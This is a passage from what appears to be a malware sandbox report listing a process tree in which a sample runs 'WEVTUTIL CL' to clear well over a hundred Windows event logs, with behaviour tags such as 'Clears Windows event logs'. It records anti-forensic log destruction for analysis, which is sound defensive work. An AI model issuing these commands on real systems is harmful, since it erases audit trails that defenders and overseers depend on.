    WEVTUTIL CL "Microsoft-Windows-Network-Setup/Diagnostic"
    3⤵
    PID:6504
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
    3⤵
    PID:10044
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkBridge/Diagnostic"
    3⤵
    PID:10908
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkLocationWizard/Operational"
    3⤵
    PID:6476
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkProfile/Diagnostic"
    3⤵
    PID:11544
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkProfile/Operational"
    3⤵
    PID:11676
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkProvider/Operational"
    3⤵
    PID:11008
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkProvisioning/Analytic"
    3⤵
    PID:11612
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkProvisioning/Operational"
    3⤵
    PID:10076
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkSecurity/Debug"
    3⤵
    PID:5972
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NetworkStatus/Analytic"
    3⤵
    PID:12200
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Networking-Correlation/Diagnostic"
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Networking-RealTimeCommunication/Tracing"
    3⤵
    - System Time Discovery
    PID:3164
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NlaSvc/Diagnostic"
    3⤵
    PID:12228
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-NlaSvc/Operational"
    3⤵
    PID:9704
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Ntfs/Operational"
    3⤵
    PID:11816
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Ntfs/Performance"
    3⤵
    PID:11944
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Ntfs/WHC"
    3⤵
    - Clears Windows event logs
    PID:10628
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OLE/Clipboard-Performance"
    3⤵
    PID:8552
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OLEACC/Debug"
    3⤵
    PID:724
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OLEACC/Diagnostic"
    3⤵
    PID:6604
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OOBE-FirstLogonAnim/Diagnostic"
    3⤵
    PID:10284
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OOBE-Machine-Core/Diagnostic"
    3⤵
    PID:7884
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OOBE-Machine-DUI/Diagnostic"
    3⤵
    PID:10636
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OOBE-Machine-DUI/Operational"
    3⤵
    PID:10292
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OOBE-Machine-Plugins-Wireless/Diagnostic"
    3⤵
    PID:11152
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OcpUpdateAgent/Operational"
    3⤵
    PID:10468
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Analytic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:11688
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Debug"
    3⤵
    PID:7212
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Operational"
    3⤵
    PID:11100
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OfflineFiles/SyncLog"
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OneBackup/Debug"
    3⤵
    PID:8476
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OneX/Diagnostic"
    3⤵
    PID:7040
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OneX/Operational"
    3⤵
    PID:6924
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OobeLdr/Analytic"
    3⤵
    PID:10576
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-OtpCredentialProvider/Operational"
    3⤵
    PID:9296
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PCI/Diagnostic"
    3⤵
    PID:9776
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PackageStateRoaming/Analytic"
    3⤵
    PID:10880
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PackageStateRoaming/Debug"
    3⤵
    PID:7192
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PackageStateRoaming/Operational"
    3⤵
    PID:11960
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ParentalControls/Operational"
    3⤵
    PID:8852
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Partition/Analytic"
    3⤵
    PID:8184
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Partition/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:3728
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
    3⤵
    PID:10008
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PerceptionRuntime/Operational"
    3⤵
    PID:10708
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PerceptionSensorDataService/Operational"
    3⤵
    PID:11652
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PersistentMemory-Nvdimm/Analytic"
    3⤵
    PID:8964
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PersistentMemory-Nvdimm/Diagnostic"
    3⤵
    PID:8684
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PersistentMemory-Nvdimm/Operational"
    3⤵
    PID:6648
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PersistentMemory-PmemDisk/Analytic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7928
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PersistentMemory-PmemDisk/Diagnostic"
    3⤵
    PID:9200
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PersistentMemory-PmemDisk/Operational"
    3⤵
    PID:6204
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Analytic"
    3⤵
    PID:10976
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Certification"
    3⤵
    PID:4916
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Diagnose"
    3⤵
    PID:6236
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Operational"
    3⤵
    PID:7852
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PhotoAcq/Analytic"
    3⤵
    PID:9620
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PlayToManager/Analytic"
    3⤵
    PID:8312
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Policy/Analytic"
    3⤵
    PID:10228
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Policy/Operational"
    3⤵
    PID:10448
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
    3⤵
    PID:12244
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
    3⤵
    PID:11932
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Power-Meter-Polling/Diagnostic"
    3⤵
    PID:9244
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerCfg/Diagnostic"
    3⤵
    - Power Settings
    PID:8396
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerCpl/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:3648
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6884
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Analytic"
    3⤵
    PID:7596
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug"
    3⤵
    PID:10592
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Operational"
    3⤵
    PID:9292
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerShell/Admin"
    3⤵
    PID:5624
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerShell/Analytic"
    3⤵
    PID:10052
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerShell/Debug"
    3⤵
    PID:8704
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerShell/Operational"
    3⤵
    PID:7924
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PrimaryNetworkIcon/Performance"
    3⤵
    PID:3588
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PrintBRM/Admin"
    3⤵
    PID:7588
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PrintService-USBMon/Debug"
    3⤵
    PID:3360
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PrintService/Admin"
    3⤵
    PID:10352
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PrintService/Debug"
    3⤵
    PID:10152
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PrintService/Operational"
    3⤵
    PID:9464
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Privacy-Auditing/Operational"
    3⤵
    PID:6928
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ProcessStateManager/Diagnostic"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Program-Compatibility-Assistant/Analytic"
    3⤵
    PID:6564
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Program-Compatibility-Assistant/CompatAfterUpgrade"
    3⤵
    PID:10120
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/Admin"
    3⤵
    PID:10692
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/AutoPilot"
    3⤵
    PID:10888
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/Debug"
    3⤵
    PID:8180
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/ManagementService"
    3⤵
    PID:7416
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Proximity-Common/Diagnostic"
    3⤵
    PID:5364
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Proximity-Common/Informational"
    3⤵
    PID:7108
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Proximity-Common/Performance"
    3⤵
    PID:6640
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PushNotification-Developer/Debug"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9300
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PushNotification-InProc/Debug"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:11740
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PushNotification-Platform/Admin"
    3⤵
    PID:10596
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PushNotification-Platform/Debug"
    3⤵
    PID:9916
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PushNotification-Platform/Operational"
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-QoS-Pacer/Diagnostic"
    3⤵
    PID:6260
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-QoS-qWAVE/Debug"
    3⤵
    PID:6392
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RPC-Proxy/Debug"
    3⤵
    PID:10584
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RPC/Debug"
    3⤵
    PID:7140
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RPC/EEInfo"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9192
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RRAS/Debug"
    3⤵
    PID:5412
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RRAS/Operational"
    3⤵
    PID:7324
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RadioManager/Analytic"
    3⤵
    PID:9056
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Ras-NdisWanPacketCapture/Diagnostic"
    3⤵
    PID:8060
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RasAgileVpn/Debug"
    3⤵
    PID:7528
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RasAgileVpn/Operational"
    3⤵
    PID:9348
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ReFS/Operational"
    3⤵
    PID:7576
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ReadyBoost/Analytic"
    3⤵
    PID:7492
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ReadyBoost/Operational"
    3⤵
    PID:7032
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Analytic"
    3⤵
    PID:7716
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Operational"
    3⤵
    PID:6832
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Regsvr32/Operational"
    3⤵
    PID:7992
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
    3⤵
    PID:6516
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteApp and Desktop Connections/Operational"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6912
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Admin"
    3⤵
    - Clears Windows event logs
    PID:4840
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Operational"
    3⤵
    PID:10724
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Tracing"
    3⤵
    PID:9148
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
    3⤵
    PID:9124
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Debug"
    3⤵
    PID:6940
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
    3⤵
    PID:8388
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RemoteFX-Synth3dvsc/Admin"
    3⤵
    PID:12044
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-Kernel-Mode-Transport/Debug"
    3⤵
    PID:10660
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-User-Mode-Transport/Debug"
    3⤵
    PID:10928
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7664
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Remotefs-Rdbss/Diagnostic"
    3⤵
    PID:9012
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Remotefs-Rdbss/Operational"
    3⤵
    PID:9628
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ResetEng-Trace/Diagnostic"
    3⤵
    PID:8756
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
    3⤵
    PID:5632
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ResourcePublication/Tracing"
    3⤵
    PID:10556
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RestartManager/Operational"
    3⤵
    PID:4452
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RetailDemo/Admin"
    3⤵
    PID:2240
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RetailDemo/Operational"
    3⤵
    PID:7856
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Runtime-Graphics/Analytic"
    3⤵
    PID:10492
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Runtime-Networking-BackgroundTransfer/Tracing"
    3⤵
    PID:5548
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Runtime-Networking/Tracing"
    3⤵
    PID:9384
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Runtime-Web-Http/Tracing"
    3⤵
    PID:3220
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Runtime-WebAPI/Tracing"
    3⤵
    PID:10380
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTAdaptiveMediaSource"
    3⤵
    - Clears Windows event logs
    PID:7592
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTCaptureEngine"
    3⤵
    - Clears Windows event logs
    - System Location Discovery: System Language Discovery
    PID:11040
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTMediaStreamSource"
    3⤵
    PID:6548
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTTranscode"
    3⤵
    PID:7500
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Runtime/CreateInstance"
    3⤵
    PID:7900
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Runtime/Error"
    3⤵
    PID:6796
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBClient/Analytic"
    3⤵
    PID:7304
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBClient/HelperClassDiagnostic"
    3⤵
    PID:7048
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBClient/ObjectStateDiagnostic"
    3⤵
    PID:8068
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBClient/Operational"
    3⤵
    PID:8856
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBDirect/Admin"
    3⤵
    PID:6208
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBDirect/Debug"
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBDirect/Netmon"
    3⤵
    PID:8588
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBServer/Analytic"
    3⤵
    PID:11000
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBServer/Audit"
    3⤵
    PID:6408
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBServer/Connectivity"
    3⤵
    PID:7252
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBServer/Diagnostic"
    3⤵
    PID:6776
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBServer/Operational"
    3⤵
    PID:9136
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBServer/Performance"
    3⤵
    PID:11124
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBServer/Security"
    3⤵
    PID:6164
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBWitnessClient/Admin"
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SMBWitnessClient/Informational"
    3⤵
    PID:10740
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SPB-ClassExtension/Analytic"
    3⤵
    PID:7424
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SPB-HIDI2C/Analytic"
    3⤵
    PID:9316
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Schannel-Events/Perf"
    3⤵
    PID:6992
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Sdbus/Analytic"
    3⤵
    PID:11168
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Sdbus/Debug"
    3⤵
    PID:9552
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Sdstor/Analytic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2352
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Search-Core/Diagnostic"
    3⤵
    PID:6316
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
    3⤵
    PID:10016
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SearchUI/Diagnostic"
    3⤵
    PID:9276
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SearchUI/Operational"
    3⤵
    PID:7772
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SecureAssessment/Operational"
    3⤵
    PID:7004
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-Adminless/Operational"
    3⤵
    PID:6892
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
    3⤵
    PID:8532
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
    3⤵
    PID:12016
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-EnterpriseData-FileRevocationManager/Operational"
    3⤵
    PID:9840
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Operational"
    3⤵
    PID:8596
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Performance"
    3⤵
    PID:8288
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-IdentityListener/Operational"
    3⤵
    PID:5408
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-IdentityStore/Performance"
    3⤵
    PID:8088
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational"
    3⤵
    - Clears Windows event logs
    PID:8696
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-Mitigations/KernelMode"
    3⤵
    PID:9160
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-Mitigations/UserMode"
    3⤵
    PID:10668
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-Netlogon/Operational"
    3⤵
    PID:10548
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-SPP-UX-GC/Analytic"
    3⤵
    PID:10620
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-SPP-UX-GenuineCenter-Logging/Operational"
    3⤵
    - Clears Windows event logs
    PID:11060
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-SPP-UX-Notifications/ActionCenter"
    3⤵
    PID:9760
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-SPP-UX/Analytic"
    3⤵
    PID:6932
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-SPP/Perf"
    3⤵
    PID:8468
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-UserConsentVerifier/Audit"
    3⤵
    PID:8920
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-Vault/Performance"
    3⤵
    PID:7580
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SecurityMitigationsBroker/Admin"
    3⤵
    PID:7872
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SecurityMitigationsBroker/Operational"
    3⤵
    PID:6472
